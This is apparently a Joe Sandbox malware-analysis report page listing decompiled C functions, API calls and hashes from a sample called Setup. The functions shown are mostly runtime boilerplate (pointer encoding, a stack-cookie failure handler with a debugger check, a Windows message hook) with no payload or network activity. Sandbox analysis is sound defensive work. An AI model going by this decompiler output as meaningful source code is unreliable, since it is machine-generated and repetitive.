                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 5dbd62528cc33c2737e932bb5ae544e02b3404c8f173e11231d85b841e937ac0
                                                                                                                                                              • Instruction ID: bec5800c557f340bf7698a95b029d2fbb24a3ee7f25a093016f180e1ef5b7da0
                                                                                                                                                              • Opcode Fuzzy Hash: 5dbd62528cc33c2737e932bb5ae544e02b3404c8f173e11231d85b841e937ac0
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004BF560 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004BF560() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;

				_t1 = E004C0DC0(_t2, _t3, _t4); // executed
				return _t1;
			}







                                                                                                                                                              0x004bf563
                                                                                                                                                              0x004bf569

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 36217ca55ba7067f56672730f101b919342073117d73d6d31b8693e56017cb5f
                                                                                                                                                              • Instruction ID: cf1a588253af38d5c78ed486e3d1a561b58262cfe137cd86dc82a65ec62bf7f7
                                                                                                                                                              • Opcode Fuzzy Hash: 36217ca55ba7067f56672730f101b919342073117d73d6d31b8693e56017cb5f
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00501CE0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00501CE0() {
				void* _t1;

				_t1 = E0041C3A0(); // executed
				return _t1;
			}




                                                                                                                                                              0x00501ce3
                                                                                                                                                              0x00501ce9

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 9c390c8b228b117941798a9353a1551da3fb7115f03c5a0abe938777e2469494
                                                                                                                                                              • Instruction ID: 6dac575237f18692247e38d0b2baf8532e2833ff646b7f3847b638fe8afd50dd
                                                                                                                                                              • Opcode Fuzzy Hash: 9c390c8b228b117941798a9353a1551da3fb7115f03c5a0abe938777e2469494
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0045716E Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0045716E() {
				void* _t1;

				_t1 = E004570FC(0); // executed
				return _t1;
			}




                                                                                                                                                              0x00457170
                                                                                                                                                              0x00457176

                                                                                                                                                              APIs
                                                                                                                                                              • __encode_pointer.LIBCMT ref: 00457170
                                                                                                                                                                • Part of subcall function 004570FC: TlsGetValue.KERNEL32(00000000,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 0045710E
                                                                                                                                                                • Part of subcall function 004570FC: TlsGetValue.KERNEL32(00000005,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 00457125
                                                                                                                                                                • Part of subcall function 004570FC: RtlEncodePointer.NTDLL(00000000,?,00457175,00000000,0046568D,005BCE20,00000000,00000314,?,00458A62,005BCE20,Microsoft Visual C++ Runtime Library,00012010), ref: 00457163
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2585649348-0
                                                                                                                                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                              • Instruction ID: 4cff56d5ea146b4bd30a3f784e89dbd8dce4e4a2a3783387e5a5808369999fb2
                                                                                                                                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004EDEB0 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoUninitialize.OLE32(?,0041A0C8), ref: 004EDEB3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3861434553-0
                                                                                                                                                              • Opcode ID: a5de02cbd1b11b3a82bc3a5a1e72936b420f8548ddea6dfcec47597dc26e73e4
                                                                                                                                                              • Instruction ID: 2a972c4fab728814f709459dfd4ff36875e05d45aa0f4f1982a65f74532dffed
                                                                                                                                                              • Opcode Fuzzy Hash: a5de02cbd1b11b3a82bc3a5a1e72936b420f8548ddea6dfcec47597dc26e73e4
                                                                                                                                                              • Instruction Fuzzy Hash: B490223000020C8B0200238038080E0330C88200323800000E00C000208B0020000080
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 0044F1DA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 68memorylibraryloaderCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0044F1DA() {
				int _t3;
				void* _t5;
				long _t7;
				long _t12;
				long _t17;
				struct HINSTANCE__* _t23;
				void* _t25;
				LONG* _t29;

				_t3 = IsProcessorFeaturePresent(0xc);
				if(_t3 != 0) {
					_t23 = LoadLibraryA("kernel32.dll");
					__eflags = _t23;
					if(_t23 != 0) {
						 *0x5bc844 = GetProcAddress(_t23, "InterlockedPushEntrySList");
						 *0x5bc848 = GetProcAddress(_t23, "InterlockedPopEntrySList");
					}
					__eflags =  *0x5bc844; // 0x0
					if(__eflags == 0) {
						L12:
						_t5 = 0;
						__eflags = 0;
					} else {
						__eflags =  *0x5bc848; // 0x0
						if(__eflags == 0) {
							goto L12;
						} else {
							_t29 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x34;
							_t7 =  *_t29;
							__eflags = _t7;
							if(_t7 != 0) {
								L11:
								 *0x5bc840 = _t7;
								_t5 = 1;
							} else {
								_t25 = HeapAlloc(GetProcessHeap(), 0, 8);
								__eflags = _t25;
								if(_t25 == 0) {
									goto L12;
								} else {
									 *_t25 = 0;
									 *((intOrPtr*)(_t25 + 4)) = 0;
									_t12 = InterlockedCompareExchange(_t29, _t25, 0);
									__eflags = _t12;
									if(_t12 != 0) {
										HeapFree(GetProcessHeap(), 0, _t25);
									}
									_t7 =  *_t29;
									goto L11;
								}
							}
						}
					}
					return _t5;
				} else {
					_t17 = _t3 + 1;
					 *0x5bc840 = _t17;
					return _t17;
				}
			}











                                                                                                                                                              0x0044f1dc
                                                                                                                                                              0x0044f1e4
                                                                                                                                                              0x0044f1fb
                                                                                                                                                              0x0044f1ff
                                                                                                                                                              0x0044f201
                                                                                                                                                              0x0044f217
                                                                                                                                                              0x0044f21e
                                                                                                                                                              0x0044f21e
                                                                                                                                                              0x0044f223
                                                                                                                                                              0x0044f229
                                                                                                                                                              0x0044f289
                                                                                                                                                              0x0044f289
                                                                                                                                                              0x0044f289
                                                                                                                                                              0x0044f22b
                                                                                                                                                              0x0044f22b
                                                                                                                                                              0x0044f231
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f233
                                                                                                                                                              0x0044f23c
                                                                                                                                                              0x0044f23f
                                                                                                                                                              0x0044f241
                                                                                                                                                              0x0044f243
                                                                                                                                                              0x0044f27f
                                                                                                                                                              0x0044f27f
                                                                                                                                                              0x0044f286
                                                                                                                                                              0x0044f245
                                                                                                                                                              0x0044f257
                                                                                                                                                              0x0044f25b
                                                                                                                                                              0x0044f25d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f25f
                                                                                                                                                              0x0044f262
                                                                                                                                                              0x0044f264
                                                                                                                                                              0x0044f267
                                                                                                                                                              0x0044f26d
                                                                                                                                                              0x0044f26f
                                                                                                                                                              0x0044f277
                                                                                                                                                              0x0044f277
                                                                                                                                                              0x0044f27d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f27d
                                                                                                                                                              0x0044f25d
                                                                                                                                                              0x0044f243
                                                                                                                                                              0x0044f231
                                                                                                                                                              0x0044f28e
                                                                                                                                                              0x0044f1e6
                                                                                                                                                              0x0044f1e6
                                                                                                                                                              0x0044f1e7
                                                                                                                                                              0x0044f1ec
                                                                                                                                                              0x0044f1ec

                                                                                                                                                              APIs
                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,0044F2B0,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1DC
                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1F5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 0044F20F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 0044F21C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F24E
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F251
                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0044F267
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F274
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F277
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                              • String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
                                                                                                                                                              • API String ID: 3830925854-2586642590
                                                                                                                                                              • Opcode ID: 7a83753e704f731a755ff519826a143a61fd290225ef870a82e095b13b2b41f9
                                                                                                                                                              • Instruction ID: 14295b3ad7532e1049eeb092a543909dfedfbe3ce8ac3f2238d5ae29e678ce0a
                                                                                                                                                              • Opcode Fuzzy Hash: 7a83753e704f731a755ff519826a143a61fd290225ef870a82e095b13b2b41f9
                                                                                                                                                              • Instruction Fuzzy Hash: 27118275A40251AFFB609FB8AC88D573BE8FB68741B05467AF509C3210D7749C48DA64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044F6C8 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0044F6C8(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x561244; // 0xddd124f9
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x5bca50 = _t6;
				 *0x5bca4c = _t22;
				 *0x5bca48 = _t25;
				 *0x5bca44 = _t21;
				 *0x5bca40 = _t27;
				 *0x5bca3c = _t26;
				 *0x5bca68 = ss;
				 *0x5bca5c = cs;
				 *0x5bca38 = ds;
				 *0x5bca34 = es;
				 *0x5bca30 = fs;
				 *0x5bca2c = gs;
				asm("pushfd");
				_pop( *0x5bca60);
				 *0x5bca54 =  *_t31;
				 *0x5bca58 = _v0;
				 *0x5bca64 =  &_a4;
				 *0x5bc9a0 = 0x10001;
				_t11 =  *0x5bca58; // 0x0
				 *0x5bc954 = _t11;
				 *0x5bc948 = 0xc0000409;
				 *0x5bc94c = 1;
				_t12 =  *0x561244; // 0xddd124f9
				_v812 = _t12;
				_t13 =  *0x561248; // 0x222edb06
				_v808 = _t13;
				 *0x5bc998 = IsDebuggerPresent();
				_push(1);
				E00462ED7(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x51bce0);
				if( *0x5bc998 == 0) {
					_push(1);
					E00462ED7(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6c8
                                                                                                                                                              0x0044f6ce
                                                                                                                                                              0x0044f6d0
                                                                                                                                                              0x0044f6d0
                                                                                                                                                              0x00456ef2
                                                                                                                                                              0x00456ef7
                                                                                                                                                              0x00456efd
                                                                                                                                                              0x00456f03
                                                                                                                                                              0x00456f09
                                                                                                                                                              0x00456f0f
                                                                                                                                                              0x00456f15
                                                                                                                                                              0x00456f1c
                                                                                                                                                              0x00456f23
                                                                                                                                                              0x00456f2a
                                                                                                                                                              0x00456f31
                                                                                                                                                              0x00456f38
                                                                                                                                                              0x00456f3f
                                                                                                                                                              0x00456f40
                                                                                                                                                              0x00456f49
                                                                                                                                                              0x00456f51
                                                                                                                                                              0x00456f59
                                                                                                                                                              0x00456f64
                                                                                                                                                              0x00456f6e
                                                                                                                                                              0x00456f73
                                                                                                                                                              0x00456f78
                                                                                                                                                              0x00456f82
                                                                                                                                                              0x00456f8c
                                                                                                                                                              0x00456f91
                                                                                                                                                              0x00456f97
                                                                                                                                                              0x00456f9c
                                                                                                                                                              0x00456fa8
                                                                                                                                                              0x00456fad
                                                                                                                                                              0x00456faf
                                                                                                                                                              0x00456fb7
                                                                                                                                                              0x00456fc2
                                                                                                                                                              0x00456fcf
                                                                                                                                                              0x00456fd1
                                                                                                                                                              0x00456fd3
                                                                                                                                                              0x00456fd8
                                                                                                                                                              0x00456fec

                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00456FA2
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00456FB7
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0051BCE0), ref: 00456FC2
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00456FDE
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00456FE5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                              • Opcode ID: dae8808e2844de53dae41f92b29e3f4fc1baf063fbfcee6f5a19d921d93415a2
                                                                                                                                                              • Instruction ID: 185bcfbf4be3dc7a61062cf976b791f04ca67b78da15fcb050acc9240d4305d4
                                                                                                                                                              • Opcode Fuzzy Hash: dae8808e2844de53dae41f92b29e3f4fc1baf063fbfcee6f5a19d921d93415a2
                                                                                                                                                              • Instruction Fuzzy Hash: 9321FFB88013489FE790DF29F8856543FA4FB28314F50925AE80987B60E7B4698CEF5D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004C8C80 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004C8C80(intOrPtr _a4) {
				int _t2;
				intOrPtr _t3;
				intOrPtr _t4;
				struct HHOOK__* _t7;
				intOrPtr _t8;

				if(_a4 == 0) {
					if( *0x5bde20 == 1) {
						if( *0x5bde1c != 0) {
							_t7 =  *0x5bde1c; // 0x0
							_t2 = UnhookWindowsHookEx(_t7);
						}
						 *0x5bde1c = 0;
					}
					_t8 =  *0x5bde20; // 0x0
					 *0x5bde20 = _t8 - 1;
					return _t2;
				}
				if( *0x5bde20 == 0) {
					 *0x5bde1c = SetWindowsHookExW(2,  &M004C8BE0, 0, GetCurrentThreadId());
				}
				_t3 =  *0x5bde20; // 0x0
				_t4 = _t3 + 1;
				 *0x5bde20 = _t4;
				return _t4;
			}








                                                                                                                                                              0x004c8c87
                                                                                                                                                              0x004c8cc3
                                                                                                                                                              0x004c8ccc
                                                                                                                                                              0x004c8cce
                                                                                                                                                              0x004c8cd5
                                                                                                                                                              0x004c8cd5
                                                                                                                                                              0x004c8cdb
                                                                                                                                                              0x004c8cdb
                                                                                                                                                              0x004c8ce5
                                                                                                                                                              0x004c8cee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004c8cee
                                                                                                                                                              0x004c8c90
                                                                                                                                                              0x004c8ca8
                                                                                                                                                              0x004c8ca8
                                                                                                                                                              0x004c8cad
                                                                                                                                                              0x004c8cb2
                                                                                                                                                              0x004c8cb5
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004C8C92
                                                                                                                                                              • SetWindowsHookExW.USER32(00000002,004C8BE0,00000000,00000000), ref: 004C8CA2
                                                                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 004C8CD5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HookWindows$CurrentThreadUnhook
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3577351977-0
                                                                                                                                                              • Opcode ID: c2a1efb184e29ff7a91679816487362cc365b89fc6dfbf4b1139dcfb18d8a44d
                                                                                                                                                              • Instruction ID: 78c62b7d4a257791ef89ff007e129983921d467873f45ba689db3b487d97da54
                                                                                                                                                              • Opcode Fuzzy Hash: c2a1efb184e29ff7a91679816487362cc365b89fc6dfbf4b1139dcfb18d8a44d
                                                                                                                                                              • Instruction Fuzzy Hash: 4CF0E7781002009FE7909F55EC09B6276B9B378305F10822EE5058E2A0EBBAB459EF79
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00502490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00502490(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				short _v22;
				short _v26;
				short _v30;
				short _v34;
				short _v36;
				char _v68;
				char _v69;
				signed int _t25;
				signed int _t26;
				short _t28;
				intOrPtr _t30;
				signed int _t54;

				_t53 = __esi;
				_t52 = __edi;
				_t39 = __ebx;
				_push(0xffffffff);
				_push(0x508795);
				_push( *[fs:0x0]);
				_t25 =  *0x561244; // 0xddd124f9
				_t26 = _t25 ^ _t54;
				_v20 = _t26;
				_push(_t26);
				 *[fs:0x0] =  &_v16;
				if(_a4 != 0) {
					E00417A20(__ebx, _a4 + 4, __edi, __esi, 0, 0xffffffff);
				}
				_t28 =  *0x52aca4; // 0x0
				_v36 = _t28;
				_t40 = 0;
				_v34 = 0;
				_v30 = 0;
				_v26 = 0;
				_v22 = 0;
				_t51 =  &_v36;
				if(GetLocaleInfoW(0x400, 0x5a,  &_v36, 8) >= 2) {
					if(_a4 != 0) {
						E00417910( &_v36, E00434050( &_v69));
						_v8 = 0;
						E004181D0(_a4,  &_v68);
						_v8 = 0xffffffff;
						_t40 =  &_v68;
						E004176E0();
					}
					_t51 = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t30 = 0;
					} else {
						_t30 = E00497500(_t40,  &_v36);
					}
				} else {
					_t30 = 0;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t30, _t39, _v20 ^ _t54, _t51, _t52, _t53);
			}


















                                                                                                                                                              0x00502490
                                                                                                                                                              0x00502490
                                                                                                                                                              0x00502490
                                                                                                                                                              0x00502493
                                                                                                                                                              0x00502495
                                                                                                                                                              0x005024a0
                                                                                                                                                              0x005024a4
                                                                                                                                                              0x005024a9
                                                                                                                                                              0x005024ab
                                                                                                                                                              0x005024ae
                                                                                                                                                              0x005024b2
                                                                                                                                                              0x005024bc
